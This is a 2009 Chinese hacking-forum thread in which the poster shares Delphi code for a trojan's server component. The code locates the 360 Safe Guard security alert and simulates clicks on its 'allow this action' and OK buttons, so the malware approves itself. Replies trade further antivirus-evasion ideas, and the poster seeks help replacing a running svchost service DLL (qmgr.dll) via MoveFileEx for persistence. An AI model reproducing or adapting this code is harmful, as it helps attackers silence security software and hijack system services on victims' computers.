设为首页收藏本站

熊族部落安全网-小熊技术论坛

 找回密码
 注册
搜索
查看: 9685|回复: 31

模拟点击来过360-全新代码

[复制链接]
发表于 2009-2-4 14:20:25 | 显示全部楼层 |阅读模式
相信模拟点击过360的方法大家一直在用。下面我转贴来一段
代码,不必编译成一个EXE,可以直接编译到服务单里面做一个过程就可以。

procedure Pass360Safe;
var
idid,hand,he:thandle;
begin
idid:=Findwindow('Afx:400000:0',nil);//获取360安全卫士的提示句柄
IF idid <> 0 THEN//当获得360安全卫士句柄的时候
begin
    hand:=findwindowex(idid,0,'Button','允许此动作');//先获取"允许此动作"的选项句柄
          if hand<>0 then//获得"允许此动作"的句柄
          begin
           postmessage(hand,wm_lbuttondown,0,0);
           postmessage(hand,wm_lbuttonup,0,0);//将选项确定在允许此动作上
           he:=Findwindowex(idid,0,'Button','确定');//获得"确定"的句柄
           postmessage(he,wm_lbuttondown,0,0);
           postmessage(he,wm_lbuttonup,0,0);//自动点击确定
          end;
end;
end;


=================
不知道现在 如果除了模拟点击的方法除外,还有什么好的方法来过360.。。。

前段时间我在研究 关闭XP系统保护,关闭系统的保护功能来替换服务。
发现如果要被替换的服务如果是正在运行的情况,你是无法替换的。
有几个朋友说可以替换,那是因为你要替换的服务是在关闭状态。
如果这个服务是运行状态,看你怎么弄。。。
这个服务调用的DLL文件一直在SV进程里,怎么删除页搞不定。。。
即使服务被关闭了,这个DLL页删除不掉。。。

所以如果模拟点击的方法有效果还是用这个好。。

-----------

请大家说说有什么方法改进下。。。似乎模拟点击的方法很快就没有作用了。。
发表于 2009-2-4 14:25:09 | 显示全部楼层
360很让我头疼。。。
发表于 2009-2-4 14:38:25 | 显示全部楼层
1,冰封360
2,插360的进程(非常规方法)
修改注册表关检控早就不好用了,模拟点的,没用过,如果他不提示允许此动作,而是“拒绝此动作呢”
发表于 2009-2-4 15:01:11 | 显示全部楼层
svchost调用的dll一样替换,你不会用movefileex吗,功力问题
发表于 2009-2-4 15:08:05 | 显示全部楼层
还有你这个根本不是啥新代码,而是大家用了2年多的模拟点击,360开保险箱这根本点不到
 楼主| 发表于 2009-2-4 15:20:39 | 显示全部楼层
哈哈。谢谢。大家的讨论。。
大熊出的评论有见地。。
看来是我的功力不够阿。
上次我用DeleteFile 搞不死DLL,
用movefilexe 也摆不平,非常生气。。

步知道是不是我关闭服务的代码出了问题。。
服务是明明被关闭了。但是就弄不死DLL。。。郁闷。。

振作起来,再杀过去看看。。
 楼主| 发表于 2009-2-4 15:24:27 | 显示全部楼层
360对于 未知服务,默认出现的提示就是“ 允许此动作'”
绝对不会还有其他的默认。哈哈。。
发表于 2009-2-4 15:39:10 | 显示全部楼层
开保险箱获取不到句柄的,你那个findwindow类函数,保险箱hook的
另外你删除dll干吗,你停了,再开启,就加载新的了,dll是提前载入svchost的,有映像,不是随便删除的
发表于 2009-2-4 23:13:41 | 显示全部楼层
呵呵 老熊 见识 广    学习了。
 楼主| 发表于 2009-2-4 23:46:10 | 显示全部楼层
本帖最后由 daxiaopeng 于 2009-2-5 00:25 编辑

大熊:
我这样写对不?


这样阿,我好像尝试过用movefileex 来替换,,似乎替换不了。。真奇怪。。再测试测试。。
如果成功了再来感谢大熊。。。

MoveFileEx(pchar(DLLFiles), PChar(Gesy+DLLFiles),MOVEFILE_REPLACE_EXISTING or MOVEFILE_DELAY_UNTIL_REBOOT);

不知道我这样写是不是有问题。。
说明: DLLFiles: PChar='qmgr.dll';
          Gesy 这里前面已经指定为系统目录。

请大熊 指点下。。。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|Archiver|手机版|熊族部落安全网-小熊技术论坛 ( 黔ICP备15013306号 )  

GMT+8, 2019-5-22 06:50 , Processed in 2.414063 second(s), 29 queries , Gzip On.

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表